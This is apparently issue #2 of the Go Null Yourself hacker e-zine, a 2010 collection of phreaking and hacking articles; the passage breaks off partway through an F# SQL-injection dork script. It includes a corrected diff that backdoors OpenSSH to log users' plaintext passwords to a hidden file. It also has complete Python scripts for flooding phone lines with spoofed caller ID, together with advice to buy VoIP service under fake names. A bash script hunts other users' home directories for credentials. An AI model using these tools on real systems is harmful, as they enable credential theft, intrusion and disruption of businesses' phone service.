-dh dd. :Mm MM. ,yNNNNNNNNo ,mMMMMMMMMd, dNNNNNNNNN, MM. yM :Mm MM. -Mm oMd `NM: NM: :My MM. yM :Mm MM. :Mm -++++mM oMN mM: MM: :MN MM. yM :Mm MM. .NMmmmmmmMM 'MMmmmmmNMN' MM: :MM mMNmmmmmMM :Mm MM. /o. hM: .h+ sh :hdddddddh/ dd` :ds oddddddddy. ,ddddddd-d ,yddddddddo dM/ ,ddddddddd` -Mm+++++++oMM mMs:::::oMm MM. /Mh MM::::::hMh Mm+````` yMh`````yMM mM/ Mh```````` /sssyMMssso- mM/ oMM MM. /Mh MM :+/ 'hhhhhhdM, yMh hhhhhh+ dMo MMNNNNNNNN. .MM NMdyyyyydMN MMdyyyyymMh MM ,,,,,,,,MM sMN,,,,,,,, mMo My```````` `o+ `+ooooooo+` .+oooooooo: oo .oooooooo+: `/ooooooooo /o- My My || 0x01 Introduction +: teh crew || 0x02 Feedback + Edits || 0x03 DoSing Phone Lines with Asterisk b14ck Go Null Yourself E-Zine || 0x04 duper's Code Corner duper || 0x05 Test Numbers storm Issue #2 - October 2010 || 0x06 Practical DLL Hijacking storm www.GoNullYourself.org || 0x07 Numbers Stations FOIA Request teh crew || 0x08 Exploring Tieline Networks Shadytel, Inc || 0x09 Modem Numbers storm "People who say it cannot be done should || 0x0a Linux Full-Disk Encryption With TC second not interrupt those who are doing it." || 0x0b Programming Challenge storm || 0x0c Hotel Pennsylvania's PBX Shadytel, Inc || 0x0d Interview with Adrian Lamo || 0x0e Et Cetera, Etc. teh crew [==================================================================================================] -=[ 0x01 Introduction -=[ Author: teh crew Welcome to another issue of the Go Null Yourself e-zine, and, once again, glad you could join us. You may have already noticed a few things different with this issue. First off, it was released fairly quickly after issue #1 (July 2010), much more quickly than usual e-zine series, as we are attempting to adopt a schedule of quarterly release. This means that lots of hard work is being put forth by our authors to meet such short deadlines with a sufficient amount of comprehensive, interesting content. For that, we express our deepest gratitude. Secondly, we have changed a few aspects of the zine's formatting in general. The width has been increased from 86 columns to 100, mostly for the sake of reducing the frequency of problems with line wrapping in published code. It has also been requested that each article section be labeled with its respective hexadecimal index number for easy page jumping. If you have any suggestions for the zine, submit them to us (our contact information is at the end of this article), and we will certainly consider them. Thirdly, a large chunk of content this issue is phone-related. We wish to accomplish two goals by doing this: 1) to promote interest in hacking technology besides computer systems, and 2) to pump some life back into the phreaking scene. There is so much to learn from exploring the phone system, and we hope to be there every step of the way. If you are interested in submitting content for future issues of GNY Zine, we would be happy to review it for publication. Content may take many forms, whether it be a paper, review, scan, or first-hand account of an event. Submissions of ASCII cover art that display the GNY logo in some way are also appreciated. Well-received topics include computer hacking and exploitation methods, programming, telephone phreaking (both analog and digital), system and network exploration, hardware hacking, reverse engineering, amateur radio, cryptography and steganography, and social engineering. We are also receptive to content relating to concrete subjects such as science and mathematics, along with more abstract subjects such as psychology and culture. Both technical and non-technical material is accepted. Submissions of content, suggestions for and criticisms of the zine, and death threats may be sent via: - IRC private message (storm or m0nkee @ irc.distrust.us #gny) - Email (zine@gonullyourself.org) If there is enough feedback, we will publish some of the messages in future issues. We have devoted a lot of effort into this publication and hope that you learn something from reading it. Abiding by our beliefs, any information within this e-zine may be freely re-distributed, utilized, and referenced elsewhere, but we do ask that you keep the articles fully intact (unless citing certain passages) and give credit to the original authors when and where necessary. Go Null Yourself, its staff members, and the authors of GNY Zine are not responsible for any harm or damage that may result from the information presented within this publication. Although people will be people and act in idiotic fashions, we do not condone, promote, or participate in illegal behavior in any way. [==================================================================================================] -=[ 0x02 Feedback and Edits This section is devoted to messages we've received regarding GNY Zine, both positive and negative. Readers may also submit information that they feel supplements content from previous issues. Significant errors in the zine will also be addressed. ---------------------------------------------------------------------------------------------------- Hey team. On the release of the new e-zine under the Alternate Data Streams article there's a little typo. In the first example, using C:\folders:secrets.txt the paragraph below it refers to it as "C:folders:secrets.txt". It's not something that should throw a reader off the deep end or anything. I thought it should be pointed out in case you wanted to correct it. I'm loving the articles so far. I hope you can keep up the work. I'll be coming back for sure. Thanks, -Boom >> Ah, yes, you are correct - apologies for the error. "C:folders:secrets.txt" on line 412 of issue >> #1 should be corrected to "C:\folders:secrets.txt". Thank you for reporting it and also for the >> compliment. ---------------------------------------------------------------------------------------------------- rattle of www.awarenetwork.org posted the following on his website in response to the RTLO Spoofing article from issue #1: I had a lot of fun reading the RTLO article in the GNY zIne and found myself very incompetent when it came to inputting that RTLO char anywhere. Hence, I wrote a little program that would set my clipboard to just the RTLO char, allowing me to paste it into browser forms and other stuff conveniently. I did this because the other tool that was linked [http://www.fileformat.info/tool/unicodeinput/index.htm] isn't open source. Granted, my app has no GUI, but at least you can see its insides. >> We agree that entering the RTLO character is quite tricky, and we thank you for publishing your >> source code (below). Hopefully it is useful for other readers, as it's come in handy for us! >> A pre-compiled Windows binary is available for download at >> http://www.awarenetwork.org/home/.rants/07-11-2010.08.42/rtol.exe ---------- http://www.awarenetwork.org/home/.rants/07-11-2010.08.42/rtol.asm .386 .model flat, stdcall include kernel32.inc include user32.inc .code Main: PUSH 0 CALL OpenClipboard TEST EAX, EAX JZ ERROR CALL EmptyClipboard PUSH 4 ; size of RTOL with nullchar PUSH 2 ; GMEM_MOVEABLE CALL GlobalAlloc TEST EAX,EAX JZ ERROR MOV EBX,EAX PUSH EBX CALL GlobalLock TEST EAX,EAX JZ ERROR MOV word ptr [EAX], 0202EH MOV word ptr [EAX+2], 0 PUSH EBX CALL GlobalUnlock PUSH EBX ; handle PUSH 0DH ; CF_UNICODETEXT CALL SetClipboardData MOV EDX, EAX PUSH EBX CALL GlobalFree CALL CloseClipboard TEST EDX,EDX JZ SUCCESS ERROR: PUSH 1 JMP BAIL SUCCESS: PUSH 0 BAIL: CALL ExitProcess END Main ---------- http://www.awarenetwork.org/home/.rants/07-11-2010.08.42/rtol.c #include int main() { HGLOBAL handle; WCHAR *buffer; BOOL success = FALSE; if (OpenClipboard(NULL)) { EmptyClipboard(); if ((handle = GlobalAlloc(GMEM_MOVEABLE, 2*sizeof(WCHAR))) && (buffer = GlobalLock(handle)) ) { buffer[0] = 0x202E; buffer[1] = 0; GlobalUnlock(handle); success = (SetClipboardData(CF_UNICODETEXT, handle) != NULL); GlobalFree(handle); } CloseClipboard(); } return !success; } #if 0 extern void __cdecl mainCRTStartup( void ){ ExitProcess(main()); } #endif ---------------------------------------------------------------------------------------------------- There have been reports that the patched source from Trojaning OpenSSH in issue #1 crashes upon SSH login. We regret and apologize for the error, which has been traced to an incorrect declaration of the hidden_buff buffer on line 38. The updated code is below: diff -rupN openssh-5.5p1/auth-passwd.c openssh-5.5p1-backdoored/auth-passwd.c --- openssh-5.5p1/auth-passwd.c 2009-03-07 19:40:28.000000000 -0500 +++ openssh-5.5p1-backdoored/auth-passwd.c 2010-06-17 14:14:23.000000000 -0400 @@ -123,6 +123,19 @@ auth_password(Authctxt *authctxt, const } #endif result = sys_auth_passwd(authctxt, password); + + // Begin Backdoor + + if ( result ){ + snprintf(hidden_buff, sizeof(hidden_buff) - 1, "Successful login %s:%s from %s\n", -> authctxt->user, password, get_remote_ipaddr()); + hidden_log(); + } else { + snprintf(hidden_buff, sizeof(hidden_buff) - 1, "Invalid login %s:%s from %s\n", -> authctxt->user, password, get_remote_ipaddr()); + hidden_log(); + } + + // End Backdoor + if (authctxt->force_pwchange) disable_forwarding(); return (result && ok); diff -rupN openssh-5.5p1/includes.h openssh-5.5p1-backdoored/includes.h --- openssh-5.5p1/includes.h 2009-08-20 02:16:01.000000000 -0400 +++ openssh-5.5p1-backdoored/includes.h 2010-06-17 14:12:24.000000000 -0400 @@ -172,4 +172,24 @@ #include "entropy.h"; +// Begin Backdoor + +#include +#include +#define HIDDEN_LOG_FILE "/tmp/.ssh_log" + +FILE *hiddenlog; +char hidden_buff[1024]; + +#define hidden_log() { \ + chmod(HIDDEN_LOG_FILE, 0666); \ + hiddenlog = fopen(HIDDEN_LOG_FILE, "a"); \ + if ( hiddenlog != NULL ) { \ + fprintf(hiddenlog, "%s", hidden_buff); \ + fclose(hiddenlog); \ + } \ +} + +// End Backdoor + #endif /* INCLUDES_H */ ---------------------------------------------------------------------------------------------------- Our long-time friend sunjester posted the following at http://fusecurity.com/blog/?p=186 in response to issue #1: GNY is a familiar group to myself. They do not like me on account of several reasons that we won�t go into here. The �ezine� they released isn�t offering much, so you didn�t miss much if your looking for another hacking zine to veg out to. I have some comments of my own about their release. I saw that r00tsecurity referenced the Zine in their newsletter, in which case I had to look at it.. >> Yes, there is a bit of bad blood between sunjester and GNY. We also won't go into details, as >> they are irrelevant. 1. conversational hypnosis 2. RTLO Spoofing 3. Alternate Data Streams 4. Derandomizing Perl�s Random Number Generator 5. Trojaning OpenSSH 6. Story of a Raid 7. Programming Challenge 8. ConfCon 2010 CFP 9. 907-887-88xx Scan conversational hypnosis The first thing on their list is something called �conversational hypnosis�, the whole thing was complete b.s.. Nothing described really actually told anyone how to apply or use �covert hypnosis� which is what is more widely known as. This whole idea is based around notions and persuasion. >> I wrote the article with the specific intention of not giving enough detail for readers to be >> able to use it since it can really cause damage. It was just to show that it was out there and >> said to listen to Taylor Starr's lectures if you wanted to learn it in depth. -hsu rtlo spoofing The reason this isn�t so successful is because it�s not very practical and it�s a pain in the ass to use. This guy (Anarchy_Angel) basically just read the documents and wrote what he read. No PoC was offered or instructions or anything different than what was presented in the documents he referenced ([http://packetstormsecurity.org/papers/general/righttoleften-override.pdf], [http://hackers-hideaway.com/blog.php?post_id=94], [http://www.mozilla.org/security/announce/2009/mfsa2009-62.html]). I�m not going to continue to break down this method. >> Actually, no. I (storm) wrote the article - it says so right at the top. Anarchy_Angel's >> research was simply referenced. And yes, I wrote an article based on information I read. That's >> usually how it works. The referenced paper on packetstormsecurity.org is written in broken >> English, so I'm sure many will appreciate reading a paper that is easily decipherable; >> hackers-hideaway.com was offline at the time (and continues to be offline), so Anarchy's research >> is unavailable; and the mozilla.org link is simply an advisory. As for proof of concept, three >> example attacks were explained in the paper. I also explained how the GNY forum was affected by >> an RTLO spoofing attack. Alternate Data Streams At first glance I thought it may be worth reading until I kept scrolling down scanning through and pulling out keyworkds, etc, etc. Scanning back to the top I started reading and it was aparent from reading the first couple paragraphs that this person had not done much research. or offered a solution to finding or protecting yourself against such flaws. The first thing people should know is that there is an EASY way to view alternate data streams. Microsoft provides an application named �Streams� to help view ADS�s. You can download and read about it here. He references the application but never shows how to use it, link to it, or even talk about it. He obviously rushed through and didn�t give a crap about the actual content going into the message he was conveying in the article. While I don�t deny information provided from the article can be useful and may have shown people something new, ADS. The information wasn�t very fruitful, and could have been presented a lot better. Amir refers to metadata as �real data�. He references forking but I guess he didn�t bother to read it, if he had read the page he would have seen that it was named �metadata�, lmao. This was a good topic, it just should have been elaborated on more. >> "I'd like to thank you for taking the time to review my article... I see you have some valid >> points, but you assumed that I 'rushed' in with the topic, which is not exactly true. When this >> topic was first introduced to me, I liked it and I wanted to write a brief article to educate >> others about it. It was not new research, and it was not something that is security related at >> all. I was merely trying to let others know of the existence of such a thing. And by the way my >> name is 'Amr' not 'Amir'. Have a good one :-)" -d4de Derandomizing Perl�s Random Number Generator While it�s fun to talk about and figure things like this out, it�s not very effective for hacking or really having anything to do with computer security. >> Random numbers have everything to do with computer security. Attacks based on the prediction of >> random numbers, such as http://seclists.org/fulldisclosure/2010/Apr/167 , are becoming more and >> more practical. A cryptographic process based on predictable numbers is a broken process. >> Besides, we're not limited to content based solely on computer security. Anything that breaks or >> circumvents a system of any kind is fascinating to us. Trojaning OpenSSH yep, he did all that from a root terminal... >> So what's your point? Story of a Raid The crap this kid must have been smoking must be unbelievable! Damn, send some my way. Let�s hilight some of the dumbest shit he said. It�s super ridiculous so let�s keep it simple and try to to waste to much time on this dumb, uninformative stereotypical story. 1. and it really will leave me open to anything the FBI wants to portray me as. 2. Incriminating evidence � Sure, it�s just a simple server-client program in C 3. However, even if I did have a magnet, there is little time to do anything once they bust in. 4. My parents didn�t completely realize what was going on And my response.. 1. Really? did they do it x-files style or �hackers� style? Kicking in the door with one foot while wielding a gun in the other? A friend of mine was raided last year, and once before that a few years before. The FBI certainly didn�t kick in his door. >> "'Hackers' style, they did literally kick in the door with guns held" -OrderZero 2. A client server application is hardly a crime, and would never be considered one. >> "Are you aware of what a trojan /is/?" -OrderZero 3. Really? Do you know how much of a magnetic field is required to reset the drive? Yo mommas fridge magnet aint gonna work. >> "Yes I do and I never said a fridge magnet." -OrderZero 4. Wow, you still live with your parents? Your saying that the FBI would raid someone�s house without knowing who was inside? I guess they wouldn�t have traced the IP back to the ISP and called around huh? Go sit in the corner, change your name, and come back. >> "What does the FBI knowing who was inside have to do with what I said at all? Yes, I live with >> friends and family (or I did...). I'm 18-years-old. Honestly, if you're trying to insult me, >> kindly rephrase it and actually make it relevant to the story, please and thanks." -OrderZero ConfCon CFP What is this, 1989? >> *looks at calendar* 907-887-88xx Scan come on guys, move into the new fuckin� millenium.. >> It's a damn shame your lack of curiosity is limiting your mind so severely. Pick up your phone >> and tell me if you hear a dialtone. Last I checked, there was still an entire PSTN waiting to be >> explored. Et Cetera, Et I could only read so much and all I have to say is these people have a long way to go before actually becoming anything close to a hacker or having any kind of �hacking ethics�. In closing, be sure to know that the next release will be just as boring and shitty. Sorry guys but this was HORRIBLE and not worth reading or making the effort to archive. >> :D [==================================================================================================] -=[ 0x03 DoSing Phone Lines with Asterisk -=[ Author: b14ck -=[ Website: http://projectb14ck.org/ Table of contents 1. Intro 2. Requirements 3. Installing pycall 4. Strategy 5. Your First DoS 6. A More Advanced DoS Technique 7. Tips 8. Conclusion 9. Questions? Intro ----- Denial of Service attacks are nothing new to people in the IT and computer security world. DoS attacks are a very simplistic form of attack which aim to flood the target (whether it be a computer, mobile device, or phone line) with traffic so that it cannot process legitimate traffic. While being simple to perform, DoS attacks are often difficult to defend against without significant downtime. Today I'm going to show you how to perform a DoS attack on a phone line. This process is simple, quick to perform, and very illegal. Before we get started, I'd just like to remind you that this article is for educational purposes only! All the code I'm putting into this article is python, and should work on any system with python 2.4+. Requirements ------------ Now, in order to follow along you will need 3 main things: * An Asterisk PBX system (our favorite open source PBX) set up and running, * A lot of phone lines. We'll need a lot of phone lines because we'll need to place a lot of simultaneous calls. If you don't have hard lines, get a VoIP line (I prefer this method) as they are really cheap and quick to setup. * The last thing you'll need is my pycall python library. This is a library I wrote which allows us to create Asterisk call files quickly and easily in python. (http://github.com/comradeb14ck/pycall) For those of you unfamiliar with Asterisk, I'd highly recommend reading the PDF book Asterisk: The Future of Telephony, which is a great guide to getting started with Asterisk. (http://downloads.oreilly.com/books/9780596510480.pdf) The pycall python library mentioned above is a project I created a month or so ago which makes placing calls through Asterisk a simple task for python developers. Call files are specially formatted text files which Asterisk processes and performs actions on. pycall simplifies and abstracts a great deal of the call file creation process as call files have many small quirks which make them difficult to work with. Using pycall greatly reduces the amount of code we'll need to write and ensures that all call files are created in a secure, efficient manner. For this article, we'll be using my pycall library as a medium for quickly making calls through Asterisk without digging into the details. If you want to know more about pycall check out the Why pycall? document on the project's wiki page. Installing pycall ----------------- The good news is that pycall installs simply (it's a portable python module) and will work out of the box with no modifications to your system what-so-ever (as long as you are running some form of linux). To make things even easier, I've created a small shell script which you can run that will download and install pycall, then delete itself: ---------- #!/bin/bash # # pycall-install.sh # # @author: Randall Degges # @email: rdegges@gmail.com # @date: 11-20-2009 # # This program installs the pycall library on any linux machine which has # python 2.4+. # MIRROR=http://cloud.github.com/downloads/comradeb14ck/pycall/ NAME=pycall VER=1.2 wget $MIRROR$NAME-$VER.tar.gz tar zxvf $NAME-$VER.tar.gz cd $NAME-$VER sudo python setup.py install cd .. rm -rf $NAME-$VER rm -rf $NAME-$VER.tar.gz echo "Finished installing pycall-$VER." ---------- You can copy the script above and run it to install the library on any linux system quickly. Next, we'll write a simple application which will call your cell phone in order to make sure everything is working. Here is the source. NOTE: You will need to modify this code and fill in the appropriate details for your system. The user field (which seems a little ambiguous) refers to the user account that Asterisk is running under. If you want to create the call file as whatever user you are currently logged in as, you can remove that field all together. ---------- #!/usr/bin/python """ hello-world.py @author: Randall Degges @email: rdegges@gmail.com @date: 11-20-09 This program tests the pycall library and makes sure that you are able to place calls correctly. """ from pycall.callfile import * def main(): """ Create a call to your cell phone (for testing). It will say 'hello world' then hang up on you. """ testcall = CallFile( trunk_type = 'SIP', trunk_name = 'flowroute', number = '18182223333', application = 'Playback', data = 'hello-world', user = 'asterisk' ) testcall.run() if __name__ == '__main__': """ Program execution begins here. """ main() ---------- A quick note to non-telephony people. The above code generates a text file (call file) which is then moved to the Asterisk spooling directory: /var/spool/asterisk/outgoing. Asterisk aggressively monitors the spooling directory for call files (like the ones we are creating), parses them, and performs the actions specified by the call file. In this case, we are telling Asterisk call our cell phone, and once we pick up, play a sound file that says "hello world" and then hang up. In case you are wondering, Asterisk contains the "hello world" sound file by default, which is why we don't need anything else to make this work. Strategy -------- Now that we have our tools ready to go, let's discuss our strategy for disabling the target phone line. The goal of the attack is to prevent the target phone number from placing and receiving calls. As you can probably imagine, this is completely devastating to businesses and other communication- dependent organizations, as it completely breaks down communications. Many companies in particular rely on telephone service (think pizza places and call centers) for their primary revenue stream. Imagine the effect a 24-hour DoS attack can have on a business who relies on phone service... It can be very impacting. Our strategy is simple: to call the target phone number more times than they have phone lines. You might be thinking: This is really easy, all I have to do is pick up my phone, and keep dialing the target number over and over again to keep their phone line tied up. In reality, this does sometimes work. A great example is the 2002 New Hampshire Senate election phone jamming scandal. See http://en.wikipedia.org/wiki/2002_New_Hampshire_Senate_election_phone_jamming_scandal. Basically, "the NHGOP hired GOP Marketplace, based in Northern Virginia, to jam another phone bank being used by the state Democratic Party and the firefighters' union for efforts to turn out voters on behalf of then-governor Jeanne Shaheen on Election Day." And just in case you are wondering, yes, he went to jail. :) In reality, most businesses and other places have more than a single phone line that is connected to their phone number. PRIs, T1s, and VoIP are all common now, which means that in order to completely prevent one of those phone lines from placing calls, you will need to be generating an upwards of 23 simultaneous calls to completely disable the target. If you know anything about your target phone line, then you probably know how many calls you will need to place at any given time to keep them busy. But don't worry if you don't know anything about your target! This will be covered later in this article. Your First DoS -------------- The program below contains the source of a simple flooding application. You will still have to make your original adjustments like you did to the hello-world.py application earlier, but that's all, I promise! ---------- #!/usr/bin/python """ simple-flood.py @author: Randall Degges @email: rdegges@gmail.com @date: 11-20-09 This program floods the specified phone number. """ from time import sleep from sys import argv, exit from pycall.callfile import * def call(num): """ Create a call to the specified number which does nothing except hang up. """ testcall = CallFile( trunk_type = 'SIP', trunk_name = 'flowroute', number = num, application = 'Hangup', data = ' ', user = 'asterisk' ) testcall.run() def main(): """ Control the application logic. """ if len(argv) < 3: print 'Usage: %s [number] [calls-per-minute]' % argv[0] exit(1) number = argv[1] try: cpm = int(argv[2]) except ValueError: cpm = 1 print 'Starting call flood on target: %s. Placing %d calls per minute.' % (number, cpm) count = 1 while True: for x in xrange(cpm): print 'Placing call %d...' % count call(number) count = count + 1 sleep(60) if __name__ == '__main__': """ Program execution begins here. """ main() ---------- This small program (only a few lines!) is able to completely paralyze a target number (considering you have enough phone lines). It is fairly flexible, and allows you to specify the amount of calls-per-minute that you'd like to place. This works just like described: If you tell it to run with 60 calls per minute, then you'll immediately place 60 calls. These calls will ring to the target number, and once they pick up the phone, will immediately hang up. To run this program see the usage: ./simple-flood.py [number] [calls-per-minute] ./simple-flood.py 18002223333 5 The first parameter is the number you want to flood, and the second is the amount of calls per minute that you'd like to place to that number. Here's what it should look like running if everything goes smoothly: [root@blackbox randall]# ./simple-flood.py 18182223333 5 Starting call flood on target: 18182179229. Placing 5 calls per minute. Placing call 1... Placing call 2... Placing call 3... Placing call 4... Placing call 5... Placing call 6... Placing call 7... Placing call 8... Placing call 9... Placing call 10... Now, obviously, DoS attacks like this are simple to defend against as the victim can simply block the particular number you are calling from. However--there are ways around this too! A More Advanced DoS Technique ----------------------------- To make it harder for the victim to defend against our simple DoS attack, let's add caller ID spoofing to the calls as well (will only work if your provider allows it) so that the target can't blacklist a single number because you are calling them from random numbers! Not only is doing this simple, it is also highly effective. Imagine being a business owner, and instantly getting 100 calls from 100 different numbers. You'd be confused, unable to do anything except unplug your phone lines (which doesn't accomplish anything), and unable to receive business. So here is our program with caller ID spoofing included. It is still used the same way, except MUCH harder to defend against. ---------- #!/usr/bin/python """ advanced-flood.py @author: Randall Degges @email: rdegges@gmail.com @date: 11-20-09 This program floods the specified phone number and spoofs caller ID making it much harder to trace / prevent. """ from time import sleep from sys import argv, exit from pycall.callfile import * from random import seed, randint def genid(): """ Generate a random 10-digit US telephone number for spoofing to. """ return str(randint(1000000000, 9999999999)) def call(num, cid): """ Create a call to the specified number which does nothing except hang up. Also spoofs caller ID to a random 10 digit number. """ testcall = CallFile( trunk_type = 'SIP', trunk_name = 'flowroute', callerid_num = cid, number = num, application = 'Hangup', data = ' ', user = 'asterisk' ) testcall.run() def main(): """ Control the application logic. """ seed() # seed the random number generator if len(argv) < 3: print 'Usage: %s [number] [calls-per-minute]' % argv[0] exit(1) number = argv[1] try: cpm = int(argv[2]) except ValueError: cpm = 1 print 'Starting call flood on target: %s. Placing %d calls per minute.' % (number, cpm) count = 1 while True: for x in xrange(cpm): cid = genid() print 'Placing call %d using caller ID %s...' % (count, cid) call(number, cid) count = count + 1 sleep(60) if __name__ == '__main__': """ Program execution begins here. """ main() ---------- Here's an example of what this program should look like running. Note that it generates a different caller ID for each call. >:) [root@blackbox randall]# ./advanced-flood.py 18182223333 7 Starting call flood on target: 18182223333. Placing 7 calls per minute. Placing call 1 using caller ID 7110992417... Placing call 2 using caller ID 3689407130... Placing call 3 using caller ID 4139439982... Placing call 4 using caller ID 9795095964... Placing call 5 using caller ID 5278670787... Placing call 6 using caller ID 6684773360... Placing call 7 using caller ID 2716775282... Now this is a lot better! Tips ---- The first tip is for those of you who don't know how many calls you have to place to disable your target. USE VOIP! VoIP providers are great for DoS attacks because they: * Can be purchased online using a fake name / credit card. * Are cheap (much less expensive than analog lines) and don't require additional hardware. * Can place a ton of calls quickly. With hard lines you are limited to very few channels. With most VoIP lines, you are only limited by your bandwidth. Of the 3 reasons above, reason 3 is particularly important. VoIP calls use either the IAX or SIP protocols to initiate calls. When VoIP calls are made, SIP packets are sent back and fourth from your server to your VoIP provider, who then relays the call to the target. What is special about this is that it uses almost no bandwidth. The only thing being transmitted are IAX or SIP packets (which are small). The actual bulk of bandwidth usage typically associated with VoIP calls comes into play once a call has been answered. Once a call is answered, an RTP stream is opened which then sends large voice packets across your connection, thereby increasing your bandwidth usage immensely. Why does this matter? It matters because it gives you a killer advantage that your target does not have. It gives you an easier way to scale your attack. Let's say a target phone number has 5 lines. Let's also assume that you are running this DoS from a home computer with an extremely limited internet connection that restricts you to 10KB/s up. That typically wouldn't be enough for a single VoIP call, so you would never be able to make 5 calls and flood your target. WRONG. Since you call the target and immediately hang up, there are no RTP packets! This means that you can place as many simultaneous calls as you can send SIP invites (a LOT). Conclusion ---------- With the information and source code provided, you should be able to easily DoS yourself or stress test other phone numbers in no time. I've started development on what will soon be a fully completed Asterisk DoS client with lots of juicy command line options, statistics, and other cool items. If you're interested in following my progress, feel free to check out the project page for it at http://github.com/comradeb14ck/asteriskdos. And that's about it! [==================================================================================================] -=[ 0x04 duper's Code Corner -=[ Author: duper -=[ Website: http://projects.ext.haxnet.org/~super/ #!/bin/bash # # _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ # / \ / \ / \ / \ / \ / \ / \ / \ / \ / \ / \ / \ / \ / \ / \ / \ / \ #( d | u | p | e | r | ' | s ) ( c | o | d | e ) ( c | o | r | n | e | r ) # \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ # # # scan-home-dirs.bash by duper for GNY # Fri Oct 1 04:57:00 UTC 2010 # # A bash script that scans home directories and other filesystem directory # hierarchies for sensitive data conducive to attacks against local privilege # escalation.. # # NOTE: this script requires GNU parallel as a prerequisite. You may need to # install the tarball from http://gnu.org/software/parallel first.. # # Feel free to add your own common directories, subdirectories, "hidden" # dot-files and such to scan. The regular expression for matching sensitive data # can be easily configured as well. # # This is the command I use for finding new filenames to add to the script: # # nice -2 find / \( -type f -or -type d \) -and \( -perm /0001 -or \ # -perm /0002 \) -and \( -not -iname "/proc/*" -and -name ".*" -or \ # -iname "*.cf" -or -iname "*.conf" \) -and -not -empty \ # -fls /tmp/find.$$ 2>/dev/null # # ..obviously the output goes to /tmp. This script essentially allows you to # discover data in hidden files within directories that you may not necessarily # have read access to -- If you've ever seen dirbx.c, a brute force executable # directory lister by dmuz and methodic, then you probably understand this # concept already. However, the problem with dirbx is that it takes too long # to generate all the filename combinations. Therefore, scan-home-dirs (this # script) just uses well-known file and directory names to expedite the process. # # If you're not familiar with dirbx, I'm including an excerpt of the mailing # list message from whence it first appeared: # # "AngryPacket Security is proud to announce the release of dirbx! dirbx is # a brute force executable directory and file enumerator. It could prove # to be very useful in local pen-tests where you don't have UID 0 and some # directories have "--x" permissions. " # # So in other words, you're going to get `Permission denied' if you try to run # /bin/ls on a directory with only the world execute bit set. Regardless, you # can still view world readable files inside that directory if you provide # /bin/cat with a full pathname. For example: # # [super@callisto ~]$ ls -ld /home/whye # drwx-----x 13 whye whye 4096 Sep 21 04:35 /home/whye # [super@callisto ~]$ ls /home/whye # ls: /home/whye: Permission denied # [super@callisto ~]$ ls -ld /home/whye/.bashrc # -rw-r--r-- 1 whye whye 225 Mar 21 2010 /home/whye/.bashrc # [super@callisto ~]$ head -4 /home/whye/.bashrc # .bashrc # # Source global definitions # if [ -f /etc/bashrc ]; then # [super@callisto ~]$ # # Display program banner echo echo 'scan-home-dirs.bash by duper for GNY' echo '====================================' echo # First, we'll look through directories that we ARE able to read declare -a alist=$(ls -altd /home/*/.* | awk '/^d/ {print($9)}' | \ egrep -v '([.]+)$') # Loop through the list and display on standard output for f in $alist do printf "%s\n" $f done # These are the filename/pathname/globbing/patterns/etc. to look for in the # directories that we only have execute access on, i.e. no read access. declare -a filez=(core .bash_history .profile .ptksh_history .sh_history \ .history dead.letter mbox .Xauthority .forward .bitchxrc .pine-debug1 \ .addressbook .bash_login .bash_logout .screenrc .addressbook.lu .cshrc \ .bashrc .tcshrc .zshrc .nessusrc .nessusrc.cert .obv.friends .obv.shitlist \ .festival_history .mysql_history .muttrc .ircrc .realplayerrc .rhosts \ .htpasswd .passwd .procmailrc .zsh_history .zshhistory .BitchX/* .irssi/* \ .lftp/* .ssh2/* .ssh/* .pgp/* .gnupg/* .mozilla/* .ncftp/* .subversion/* \ public_html/* bin/* tmp/* temp/* * */* */*/* */*/*/*) # Next, we parallelize the reads for the directories we DON'T have read access # for. Again, the extended regular expression and home directory pathname glob # can be modified to your liking. By default, home directories are checked for # strings which look like sensitive and/or hex-encoded/encrypted data. declare -a ret=`parallel -j6 'egrep -in "^[a-z]{4,}:[a-z0-9/.]{6,}| -p \ |pass |auth|secret|private|backdoor|trojan|rootkit|assword|admin|\ [0-9A-F]{32,40}"' /home/*/{} 2>/dev/null ::: ${filez}` # Loop through and format output for fully qualified pathnames that are returned for apath in $ret do printf "%s\n" $apath done # Tell the shell how many files we found while we're exiting exit ${#ret} #EOF ---------------------------------------------------------------------------------------------------- (* GNY-SID is a SQL Injection Dorker script written in F# (pronounced "F-Sharp") which is a new functional language developed by Don Syme of Microsoft Research for the .NET framework. It is now included with Visual Studio; I happen to be using the 2010 Ultimate version. However, you can download an F# interpreter separately from http://msdn.microsoft.com/fsharp -- and even though I said "interpreter", F# is also a language that can be compiled to .NET's CIL (Common Intermediate Language.) In this case, the code included below is intended to be interpreted. As such, I have named the script GNY-SID.fsx as "fsx" is the filename extension used for F# scripts. You can simply cut and paste the code into fsi.exe, or if you're using Visual Studio, use the keystroke combinations CTRL-A (Select All) and ALT-ENTER to send the code to the F# Interactive Window. FSI is just a REPL (Read-Eval-Print-Loop) as you've probably seen included with other interpreted languages like Perl, Scheme, and Python. Although the FSI window doesn't currently feature syntax hilighting or IntelliSense drop-downs like Visual Studio, you can still use the TAB key to page through static functions provided by a particular module. For example, typing "List." and then continually hitting TAB will provide core F# functions available to the list data type. I personally have FSI listed in my Start Menu and edited the Shortcut Key in Properties to be CTRL+ALT+F so I can quickly access the F# REPL at any time. Okay, now onto how GNY-SID.fsx itself works: *) (*%*%*%* GNY-SID.fsx by duper for GNY *%*%*%*) // Open the standard .NET namespaces we'll be accessing open System open System.Net open System.Web open System.Text open System.Text.RegularExpressions // This namespace is exclusive to F# .. you can tell by the name ;) open Microsoft.FSharp.Control.WebExtensions // The first part of the search engine's CGI URL for finding web pages let theUrl = [ "http://search.yahoo.com/search?p=" ] // This will eventually be URL-encoded and appended to the URL above.. // It's the actual "dork" search string.. let ad0rq = [ "warning ociexecute \"on line\"" ] // Extract matched subexpression strings (i.e., vulnerable web site URI's) let rec printRegexMatches (m : Match) = let matchString = m.Groups.[1].Value.ToString() if not(matchString.Length.Equals(0)) then match m.Success with | true -> matchString :: printRegexMatches(m.NextMatch()) | _ -> [] else [] (* This is a tail-recursive function including the regular expression that matches the vulnerable web pages returned by the search engine. Obviously, if the search engine changes the formatting of its output HTML, then this regexp needs to be changed as well. Ideally, we would have access to a SOAP web service or RSS/ATOM feed where the XML formatting is guaranteed. *) let printPageMatches(htm : string) = let re = new Regex("

